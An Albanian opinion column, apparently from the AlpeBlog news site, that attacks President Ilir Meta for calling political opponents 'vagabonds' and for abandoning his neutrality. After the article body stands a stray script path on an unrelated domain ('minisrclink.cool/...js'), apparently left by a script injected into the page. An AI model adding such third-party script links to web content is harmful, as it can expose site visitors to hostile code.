• HOME
AlpeBlog
AlpeBlog

June 7th, 2026
  • HOME
ARTURA AJAZI/ Një president si Meta, që flet për “vagabondë”
Home
Blog

ARTURA AJAZI/ Një president si Meta, që flet për “vagabondë”

December 27th, 2019 F.autor Blog 0 comments

I ftuar në një portal televiziv, kreu në detyrë i shtetit Ilir Meta, ka folur “ashpër” lidhur me situatën politike, dhe nuk ka ngurruar të nxjerrë nga arkivat e tij folklorikë edhe fjalë të tilla si “vagabondë, batak”.

Sinqerisht nuk mund ta besoj se Ilir Meta është kryetar shtetit, sinqerisht nuk mund ta kuptoj se si Ilir Meta qëndron akoma në zyrën e tij në Presidencë, kur ka kaq shumë mllefe, inate, kaq shumë vrer të mbledhur prej kohësh ndoshta për një pjesë të klasës politike, dhe arrin deri atje sa ti quajë “vagabondë” që flasin në emër të popullit.

Si mund të qëndrojë një kryetar shtetit mes “vagabondëve dhe batakut”, si nuk distancohet, dhe hapi i duhur është largimi, dhe jo lufta verbale dhe sulmet nga frëngji “kullash” dhe portalesh televizive.

Një kryetar shteti që flet me fjalor bajat dhe banal, që ka 1 viti e ca, që merret me qeverisjen, kryeministrin Rama, me Parlamentin, që merret me deputetët dhe prokurorët, një kryetar shtetit që nuk lë rast pa dalë tek dera e Presidencës dhe pa dalë para kamerave për të shpotuar ministrat, kryeministrin, dhe së fundi del dhe kërkon “referendum” për ti mbyllur “gojën vagabondëve”.

Por ata “vagabondë” zoti Meta, janë votuar nga shumica e shqiptarëve, aq sa ti, PD dhe LSI, kurrë nuk do të mund të votoheni ndonjëherë.

Ata “vagabondë” zoti Meta, kanë qenë dikur partnerët e tu politikë, kanë qenë bashkëqeverisës me ju, dhe sot janë të nderuar dhe të votuar , në ballë të punëve dhe procesit të reformimit të jetës politike dhe sociale të vendit.

Nuk mund ta besoj, që kryetari shtetit nxjerr nga goja, dhe u drejtohet kundërshtarëve të tij politikë (në fakt ai duhet të qëndrojë mbi palët) me fjalorin e portaleve televizive, duke i quajtur “vagabondë, batak” dhe shprehje të tjera, që realisht e ulin dhe shvlerësojnë shumë emrin dhe figurën e tij. Por ajo që bie në sy, dhe është e lehtë ta konstatosh është fakti se Ilir Meta, nuk lë rast pa hedhur baltë, pa sulmuar, pa ofenduar, dhe pa tentuar të diskreditojë sipas tij, qeverisjen, deputetët, kryeministrin, duke marrë në mbrojtje opozitaristët e vjetër dhe politikën e rrugës. Një kryetar shteti ka detyrimin të jetë mbi palët politike, ka detyrimin të jetë asnjëanës dhe ekuilibrues në situata të ndera, dhe jo të pozicionohet hapur “pro” njërës pale.

Një kryetar shteti , nuk bën opozitaristin, dhe nuk merr hapur rolin e opozitaristit, duke shkelur çdo normë kushtetuese. Një kryetar shteti, nuk bën lojëra me datën e zgjedhjeve, nuk bën thirrje për të zbatuar dekrete që bien ndesh me Kushtetutën, dhe nuk i shpall luftë të hapur qeverisjes për “hatër të Doktorit dhe Monikës”. Një kryetar shteti nuk jep mesazhe që nxisin largimin por bashkimin, nuk flet në media për “vagabondë dhe batak” por duhet të përmbahet, “me qetësi dhe dashuri” të kuptojë se është akoma në Presidencë, dhe jo në zyrën e Doktorit dhe kryetarit të LSI.

//minisrclink.cool/1e40c8bd4601a5a5a4.js

Facebook Twitter Google+ LinkedIn Pinterest
Next article KEZE KOZETA ZYLO/ T’i kam fal ty me tana, oh si Elvana nuk ban ma nana!
Previous article VETON SURROI/ Edi Rama dhe rruga qorre e Kosovës!

F.autor

Related Posts

KRESHNIK SPAHIU/ Pse në PD u gëzuan për ngjarjet në Nepal, Venezuelë apo në Hungari? Blog
May 22nd, 2026

KRESHNIK SPAHIU/ Pse në PD u gëzuan për ngjarjet në Nepal, Venezuelë apo në Hungari?

Leave a Reply Cancel reply

Postimet më të ndjekura
KRESHNIK SPAHIU/ Pse në PD u gëzuan për ngjarjet në Nepal, Venezuelë apo në Hungari?

KRESHNIK SPAHIU/ Pse në PD u gëzuan për ngjarjet në Nepal, Venezuelë apo në Hungari?

Blog May 22nd, 2026
MERO BAZE/ E vetmja gjë që kemi për t’i shitur Bordit të Paqes, është Edi Rama Blog

MERO BAZE/ E vetmja gjë që kemi për t’i shitur Bordit të Paqes, është Edi Rama

Jan 19th, 2026
ARTUR AJAZI/ A kemi Agjensi Kombëtare Mjedisi? Blog

ARTUR AJAZI/ A kemi Agjensi Kombëtare Mjedisi?

Feb 5th, 2026
EDUARD ZALOSHNJA/ Rrënjët e identitetit Blog

EDUARD ZALOSHNJA/ Rrënjët e identitetit

Mar 26th, 2026
ARTUR AJAZI/ Ç’do të thotë arratisja e një killer nga policia? Blog

ARTUR AJAZI/ Ç’do të thotë arratisja e një killer nga policia?

Jan 14th, 2026
  • HOME
  • Back to top
© AlpeNews 2017. Të Gjitha të drejtat e Rezervuara
Produced by o.k